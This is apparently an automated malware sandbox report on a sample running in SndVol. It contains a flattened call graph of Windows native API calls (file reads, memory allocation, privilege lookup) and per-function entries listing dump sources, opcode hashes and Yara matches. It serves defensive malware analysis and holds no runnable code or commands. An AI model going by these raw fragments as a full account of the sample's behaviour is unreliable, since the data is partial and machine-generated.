104023->104027 104024 47d4d49 104026 47da460 NtClose 104024->104026 104025 47d4d5f 104117 47d4790 NtReadFile NtClose 104025->104117 104028 47d4d50 104026->104028 104027->104020 104027->104024 104027->104025 104031 47d4c52 104027->104031 104028->104004 104030 47d4d72 104030->104004 104032 47d4cb9 104031->104032 104033 47d4c61 104031->104033 104032->104024 104041 47d4ccc 104032->104041 104034 47d4c7a 104033->104034 104035 47d4c66 104033->104035 104036 47d4c7f 104034->104036 104037 47d4c97 104034->104037 104113 47d4650 NtClose LdrInitializeThunk LdrInitializeThunk 104035->104113 104071 47d46f0 104036->104071 104037->104028 104081 47d4410 104037->104081 104039 47d4c70 104039->104004 104114 47da460 104041->104114 104042 47d4c8d 104042->104004 104045 47d4caf 104045->104004 104046 47d4d38 104046->104004 104048 47db0d1 104047->104048 104049 47db0e3 104048->104049 104135 47dbd10 104048->104135 104049->104007 104051 47db104 104138 47d4070 104051->104138 104053 47db150 104053->104007 104054 47db127 104054->104053 104055 47d4070 2 API calls 104054->104055 104056 47db149 104055->104056 104056->104053 104163 47d5390 104056->104163 104058 47db1da 104173 47d9e90 104058->104173 104062 47d9eec 104061->104062 104197 365d2c0a 104062->104197 104063 47d9f07 104065 47dbd90 104063->104065 104200 47da640 104065->104200 104067 47db329 104067->103990 104118 47daf30 104068->104118 104070 47da34c NtCreateFile 104070->104022 104072 47d470c 104071->104072 104073 47d4748 104072->104073 104074 47d4734 104072->104074 104076 47da460 NtClose 104073->104076 104075 47da460 NtClose 104074->104075 104077 47d473d 104075->104077 104078 47d4751 104076->104078 104077->104042 104120 47dbfa0 RtlAllocateHeap 104078->104120 104080 47d475c 104080->104042 104082 47d448e 104081->104082 104083 47d445b 104081->104083 104084 47d44aa 104082->104084 104089 47d45d9 104082->104089 104085 47da460 NtClose 104083->104085 104087 47d44cc 104084->104087 104088 47d44e1 104084->104088 104086 47d447f 104085->104086 104086->104045 104090 47da460 NtClose 104087->104090 104091 47d44fc 104088->104091 104092 47d44e6 104088->104092 104093 47da460 NtClose 104089->104093 104094 47d44d5 104090->104094 104100 47d4501 104091->104100 104121 47dbf60 104091->104121 104095 47da460 NtClose 104092->104095 104096 47d4639 104093->104096 104094->104045 104097 47d44ef 104095->104097 104096->104045 104097->104045 104107 47d4513 104100->104107 104124 47da3e0 104100->104124 104101 47d4567 104102 47d459a 104101->104102 104103 47d4585 104101->104103 104104 47da460 NtClose 104102->104104 104105 47da460 NtClose 104103->104105 104106 47d45a3 104104->104106 104105->104107 104108 47d45cf 104106->104108 104127 47dbb60 104106->104127 104107->104045 104108->104045 104110 47d45ba 104111 47dbd90 RtlFreeHeap 104110->104111 104112 47d45c3 104111->104112 104112->104045 104113->104039 104115 47daf30 104114->104115 104116 47da47c NtClose 104115->104116 104116->104046 104117->104030 104119 47daf40 104118->104119 104119->104070 104120->104080 104132 47da600 104121->104132 104123 47dbf78 104123->104100 104125 47da3fc 104124->104125 104126 47da420 NtReadFile 104125->104126 104126->104101 104128 47dbb84 104127->104128 104129 47dbb6d 104127->104129 104128->104110 104129->104128 104130 47dbf60 RtlAllocateHeap 104129->104130 104131 47dbb9b 104130->104131 104131->104110 104133 47daf30 104132->104133 104134 47da61c RtlAllocateHeap 104133->104134 104134->104123 104177 47da510 104135->104177 104137 47dbd3d 104137->104051 104139 47d4081 104138->104139 104140 47d4089 104138->104140 104139->104054 104162 47d435c 104140->104162 104180 47dcf00 104140->104180 104142 47d40dd 104143 47dcf00 RtlAllocateHeap 104142->104143 104146 47d40e8 104143->104146 104144 47d4136 104147 47dcf00 RtlAllocateHeap 104144->104147 104146->104144 104185 47dcfa0 104146->104185 104148 47d414a 104147->104148 104149 47dcf00 RtlAllocateHeap 104148->104149 104151 47d41bd 104149->104151 104150 47dcf00 RtlAllocateHeap 104156 47d4205 104150->104156 104151->104150 104153 47d4334 104192 47dcf60 RtlFreeHeap 104153->104192 104155 47d433e 104193 47dcf60 RtlFreeHeap 104155->104193 104191 47dcf60 RtlFreeHeap 104156->104191 104158 47d4348 104194 47dcf60 RtlFreeHeap 104158->104194 104160 47d4352 104195 47dcf60 RtlFreeHeap 104160->104195 104162->104054 104164 47d53a1 104163->104164 104165 47d4a50 7 API calls 104164->104165 104166 47d53b7 104165->104166 104167 47d5405 104166->104167 104168 47d53f2 104166->104168 104172 47d540a 104166->104172 104170 47dbd90 RtlFreeHeap 104167->104170 104169 47dbd90 RtlFreeHeap 104168->104169 104171 47d53f7 104169->104171 104170->104172 104171->104058 104172->104058 104174 47d9eac 104173->104174 104175 47d9ec3 104174->104175 104196 365d2df0 LdrInitializeThunk 104174->104196 104175->104007 104178 47daf30 104177->104178 104179 47da52c NtAllocateVirtualMemory 104178->104179 104179->104137 104181 47dcf16 104180->104181 104182 47dcf10 104180->104182 104183 47dbf60 RtlAllocateHeap 104181->104183 104182->104142 104184 47dcf3c 104183->104184 104184->104142 104186 47dcfc5 104185->104186 104190 47dcffd 104185->104190 104187 47dbf60 RtlAllocateHeap 104186->104187 104188 47dcfda 104187->104188 104189 47dbd90 RtlFreeHeap 104188->104189 104189->104190 104190->104146 104191->104153 104192->104155 104193->104158 104194->104160 104195->104162 104196->104175 104198 365d2c1f LdrInitializeThunk 104197->104198 104199 365d2c11 104197->104199 104198->104063 104199->104063 104201 47daf30 104200->104201 104202 47da65c RtlFreeHeap 104201->104202 104202->104067 104204 47c7eab 104203->104204 104205 47c7eb0 104203->104205 104204->104015 104206 47dbd10 NtAllocateVirtualMemory 104205->104206 104213 47c7ed5 104206->104213 104207 47c7f38 104207->104015 104208 47d9e90 LdrInitializeThunk 104208->104213 104209 47c7f3e 104210 47c7f64 104209->104210 104212 47da590 LdrInitializeThunk 104209->104212 104210->104015 104214 47c7f55 104212->104214 104213->104207 104213->104208 104213->104209 104215 47dbd10 NtAllocateVirtualMemory 104213->104215 104219 47da590 104213->104219 104214->104015 104215->104213 104217 47da590 LdrInitializeThunk 104216->104217 104218 47c817e 104217->104218 104218->103992 104220 47da5ac 104219->104220 104223 365d2c70 LdrInitializeThunk 104220->104223 104221 47da5c3 104221->104213 104223->104221 104225 47da7bf LookupPrivilegeValueW 104224->104225 104226 47daf30 104224->104226 104225->103996 104226->104225 104228 47da24c 104227->104228 104231 365d2ea0 LdrInitializeThunk 104228->104231 104229 47da26b 104229->103999 104231->104229 104233 47cf4a0 2 API calls 104232->104233 104234 47d43c6 104233->104234 104234->103955 104265 47c87a0 104235->104265 104238 47c8a9d 104238->103957 104239 47c87a0 18 API calls 104240 47c8a8a 104239->104240 104240->104238 104278 47cf710 9 API calls 104240->104278 104243 47da4ec 104242->104243 104369 365d2e80 LdrInitializeThunk 104243->104369 104244 47cc322 104246 47cf4a0 104244->104246 104247 47cf4bd 104246->104247 104370 47d9f90 104247->104370 104250 47cf505 104250->103961 104251 47d9fe0 LdrInitializeThunk 104252 47cf52e 104251->104252 104252->103961 104254 47d9ffc 104253->104254 104375 365d2d10 LdrInitializeThunk 104254->104375 104255 47cc385 104255->103967 104255->103970 104258 47da04c 104257->104258 104376 365d2d30 LdrInitializeThunk 104258->104376 104259 47cc459 104259->103978 104262 47d9e0c 104261->104262 104377 365d2fb0 LdrInitializeThunk 104262->104377 104263 47cc4ac 104263->103982 104266 47c7ea0 3 API calls 104265->104266 104276 47c87ba 104266->104276 104267 47c8a49 104267->104238 104267->104239 104268 47c8a3f 104269 47c8160 LdrInitializeThunk 104268->104269 104269->104267 104270 47d9ed0 LdrInitializeThunk 104270->104276 104272 47da460 NtClose 104272->104276 104274 47cc4c0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 104274->104276 104275 47d9df0 LdrInitializeThunk 104275->104276 104276->104267 104276->104268 104276->104270 104276->104272 104276->104274 104276->104275 104279 47c85d0 104276->104279 104291 47cf5f0 NtClose 104276->104291 104292 47c83a0 104276->104292 104278->104238 104280 47c85e6 104279->104280 104304 47d9850 104280->104304 104282 47c85ff 104287 47c8771 104282->104287 104325 47c81a0 104282->104325 104284 47c86e5 104285 47c83a0 10 API calls 104284->104285 104284->104287 104286 47c8713 104285->104286 104286->104287 104288 47d9ed0 LdrInitializeThunk 104286->104288 104287->104276 104289 47c8748 104288->104289 104289->104287 104290 47da4d0 LdrInitializeThunk 104289->104290 104290->104287 104291->104276 104293 47c83c9 104292->104293 104356 47c8310 104293->104356 104296 47da4d0 LdrInitializeThunk 104297 47c83dc 104296->104297 104297->104296 104298 47c8467 104297->104298 104300 47c8462 104297->104300 104360 47cf670 104297->104360 104298->104276 104299 47da460 NtClose 104301 47c849a 104299->104301 104300->104299 104301->104298 104302 47d4a50 7 API calls 104301->104302 104303 47c85b8 104302->104303 104303->104276 104305 47dbf60 RtlAllocateHeap 104304->104305 104306 47d9867 104305->104306 104332 47c9310 104306->104332 104308 47d9882 104309 47d98a9 104308->104309 104310 47d98c0 104308->104310 104311 47dbd90 RtlFreeHeap 104309->104311 104313 47dbd10 NtAllocateVirtualMemory 104310->104313 104312 47d98b6 104311->104312 104312->104282 104314 47d98fa 104313->104314 104315 47dbd10 NtAllocateVirtualMemory 104314->104315 104316 47d9913 104315->104316 104322 47d9bb4 104316->104322 104336 47dbd50 104316->104336 104319 47d9ba0 104320 47dbd90 RtlFreeHeap 104319->104320 104321 47d9baa 104320->104321 104321->104282 104323 47dbd90 RtlFreeHeap 104322->104323 104324 47d9c09 104323->104324 104324->104282 104326 47c829f 104325->104326 104327 47c81b5 104325->104327 104326->104284 104327->104326 104328 47d4a50 7 API calls 104327->104328 104329 47c8222 104328->104329 104330 47dbd90 RtlFreeHeap 104329->104330 104331 47c8249 104329->104331 104330->104331 104331->104284 104333 47c9335 104332->104333 104335 47c938d 104333->104335 104339 47ccf20 104333->104339 104335->104308 104351 47da550 104336->104351 104340 47ccf4c 104339->104340 104341 47ccf6c 104340->104341 104346 47da1f0 104340->104346 104341->104335 104343 47ccf8f 104343->104341 104344 47da460 NtClose 104343->104344 104345 47ccfca 104344->104345 104345->104335 104347 47da20c 104346->104347 104350 365d2ca0 LdrInitializeThunk 104347->104350 104348 47da227 104348->104343 104350->104348 104352 47da567 104351->104352 104355 365d2f90 LdrInitializeThunk 104352->104355 104353 47d9b99 104353->104319 104353->104322 104355->104353 104357 47c8328 104356->104357 104358 47c835c PostThreadMessageW 104357->104358 104359 47c8370 104357->104359 104358->104359 104359->104297 104361 47cf683 104360->104361 104364 47d9e60 104361->104364 104365 47d9e7c 104364->104365 104368 365d2dd0 LdrInitializeThunk 104365->104368 104366 47cf6ae 104366->104297 104368->104366 104369->104244 104371 47d9f93 104370->104371 104374 365d2f30 LdrInitializeThunk 104371->104374 104372 47cf4fe 104372->104250 104372->104251 104374->104372 104375->104255 104376->104259 104377->104263 104378 365d2ad0 LdrInitializeThunk

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 3651A036 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 481nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • NtQueryInformationProcess.NTDLL ref: 3651A19F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1887785070.0000000036510000.00000040.00000800.00020000.00000000.sdmp, Offset: 36510000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36510000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationProcessQuery
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1778838933-4108050209
                                                                                                                                                  • Opcode ID: fec0eebca03a74a6a4f8083be1d61863fdd615d3442dda782298204f744765a6
                                                                                                                                                  • Instruction ID: dedc1bea541fd4a304b8ad2a9532a93a80867774e185e78fead36cce2780290c
                                                                                                                                                  • Opcode Fuzzy Hash: fec0eebca03a74a6a4f8083be1d61863fdd615d3442dda782298204f744765a6
                                                                                                                                                  • Instruction Fuzzy Hash: C2F1FE74918A8C8FEFA5DF68CC94AEEB7E0FB98304F80462AD44AD7250DF349545CB42
                                                                                                                                                  Function 3651A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • NtQueryInformationProcess.NTDLL ref: 3651A19F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1887785070.0000000036510000.00000040.00000800.00020000.00000000.sdmp, Offset: 36510000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36510000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationProcessQuery
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1778838933-4108050209
                                                                                                                                                  • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                  • Instruction ID: 29f8428a6043a370bdf88cc7413e4075fbc2fc9e35de9703a45c16405ba27d7d
                                                                                                                                                  • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                  • Instruction Fuzzy Hash: A651FD70918A8C8FEB65EF68C8946EEBBF4FB98305F40462ED44AD7250DF349645CB41
                                                                                                                                                  Function 047DA48A Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 431 47da48a-47da48b 432 47da48d-47da4a6 431->432 433 47da420-47da429 NtReadFile 431->433 434 47da4ac-47da4cd 432->434 435 47da4a7 call 47daf30 432->435 435->434
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(047D4D72,5EB65239,FFFFFFFF,047D4A31,?,?,047D4D72,?,047D4A31,FFFFFFFF,5EB65239,047D4D72,?,00000000), ref: 047DA425
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: 0382515b3e4abf3c69fe422e606231a13454352e31f54acbd335727d85a5a1f5
                                                                                                                                                  • Instruction ID: 7edbe3010ce117a75bf5d4d997f23b2de1302d2af7a3408e9c25f04be3354938
                                                                                                                                                  • Opcode Fuzzy Hash: 0382515b3e4abf3c69fe422e606231a13454352e31f54acbd335727d85a5a1f5
                                                                                                                                                  • Instruction Fuzzy Hash: 7AF0F4B6210218AFDB14DF99DC44EA773ADEF8C254F118559FA4C97241C630E8518BA0
                                                                                                                                                  Function 047DA330 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 437 47da330-47da381 call 47daf30 NtCreateFile
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,047C9CF3,?,047D4BB7,047C9CF3,FFFFFFFF,?,?,FFFFFFFF,047C9CF3,047D4BB7,?,047C9CF3,00000060,00000000,00000000), ref: 047DA37D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                  • Instruction ID: d58d62b2f2b39385acfc1d46379b3c0a9fe132078d9c514ba64df3db0ade966e
                                                                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                  • Instruction Fuzzy Hash: D4F0BDB2211208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630F8118BA4
                                                                                                                                                  Function 047DA3E0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 440 47da3e0-47da429 call 47daf30 NtReadFile
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(047D4D72,5EB65239,FFFFFFFF,047D4A31,?,?,047D4D72,?,047D4A31,FFFFFFFF,5EB65239,047D4D72,?,00000000), ref: 047DA425
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                  • Instruction ID: cd859897e374856b73151f9f1c6ebe5ab5fb7ef40d209bf234199f2c177a35cd
                                                                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                  • Instruction Fuzzy Hash: 90F0A4B2210208ABDB18DF89DC84EEB77ADEF8C754F158249BA1D97241D630E8118BA0
                                                                                                                                                  Function 047DA510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 457 47da510-47da54d call 47daf30 NtAllocateVirtualMemory
                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,047DB104,?,00000000,?,00003000,00000040,00000000,00000000,047C9CF3), ref: 047DA549
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                  • Instruction ID: 80bc994715c8a7d803723105c4985c6a335b58563eb619fab0ba0143157aeb5d
                                                                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                  • Instruction Fuzzy Hash: 7EF015B2210208ABDB18DF89CC80EAB77ADEF88654F118149FE0897241C630F811CBA0
                                                                                                                                                  Function 047DA45B Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(047D4D50,?,?,047D4D50,047C9CF3,FFFFFFFF), ref: 047DA485
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: 30a5e1b40fbb9df25a3a67f541b366c1e5376f6ca5e14c75e8605dc12a6edb95
                                                                                                                                                  • Instruction ID: f557a3e92e152488ca3119ebd8a27b275da9ad0ff4889f3c412257ca8f54ba6a
                                                                                                                                                  • Opcode Fuzzy Hash: 30a5e1b40fbb9df25a3a67f541b366c1e5376f6ca5e14c75e8605dc12a6edb95
                                                                                                                                                  • Instruction Fuzzy Hash: 7EE0C2B92501146AD710EFA88C88EE7772CEF44254F1445AAFA285F282C630E60596E0
                                                                                                                                                  Function 047DA460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(047D4D50,?,?,047D4D50,047C9CF3,FFFFFFFF), ref: 047DA485
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                  • Instruction ID: c96271874e09a648cd29c11e41613255a407aeb9d144c199f38991e79718fff8
                                                                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                  • Instruction Fuzzy Hash: 2DD01776610214ABE714EB98CC89EA77BACEF48664F154499BA189B242C530FA0086E0
                                                                                                                                                  Function 365D2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 3f6c3e0082dd1065865c43e48385172c8262b4e4924c02ae54e586b4b0804362
                                                                                                                                                  • Instruction ID: 7965f768916c9143798fbfe5d4d0ee1db67083b2ab35652326d9baec88097c37
                                                                                                                                                  • Opcode Fuzzy Hash: 3f6c3e0082dd1065865c43e48385172c8262b4e4924c02ae54e586b4b0804362
                                                                                                                                                  • Instruction Fuzzy Hash: 1D90022164140502D50172584404656004A47D0251F99C033A2024519ECA258A96A175
                                                                                                                                                  Function 365D2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 5eb590aa9a7e0ff7738c6e4ebdf178942f370f4c5e61d2b46baa11dcd05d48ff
                                                                                                                                                  • Instruction ID: 517055f3b600839f96862ac6ac5b6b71a8311bfe809f06cc6e89a5068ee127f4
                                                                                                                                                  • Opcode Fuzzy Hash: 5eb590aa9a7e0ff7738c6e4ebdf178942f370f4c5e61d2b46baa11dcd05d48ff
                                                                                                                                                  • Instruction Fuzzy Hash: F990027124140402D54072584404786004547D0311F59C022A6064518E86598ED966A9
                                                                                                                                                  Function 365D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 42befd851a88d0b6ee09b2546d4acc0900e3b47f2d4a97c41735bc44e1ab86ee
                                                                                                                                                  • Instruction ID: 58b58c15aca54da2b7f1cd1984dc6f8ab17eb9822d8dcfbca45418c371ae3bd6
                                                                                                                                                  • Opcode Fuzzy Hash: 42befd851a88d0b6ee09b2546d4acc0900e3b47f2d4a97c41735bc44e1ab86ee
                                                                                                                                                  • Instruction Fuzzy Hash: A190026138140442D50072584414B46004587E1311F59C026E2064518D8619CD56616A
                                                                                                                                                  Function 365D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: ee5632a0301c6fcc0554ef8b940614d6ac9898a071c6c5b8668567bbad3d17b7
                                                                                                                                                  • Instruction ID: 83ebc074465d1ae607ebaca8b9a5e43d01febec45374beb06f5e48cc143c79ab
                                                                                                                                                  • Opcode Fuzzy Hash: ee5632a0301c6fcc0554ef8b940614d6ac9898a071c6c5b8668567bbad3d17b7
                                                                                                                                                  • Instruction Fuzzy Hash: 81900221251C0042D60076684C14B47004547D0313F59C126A1154518CC91589655565
                                                                                                                                                  Function 365D2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
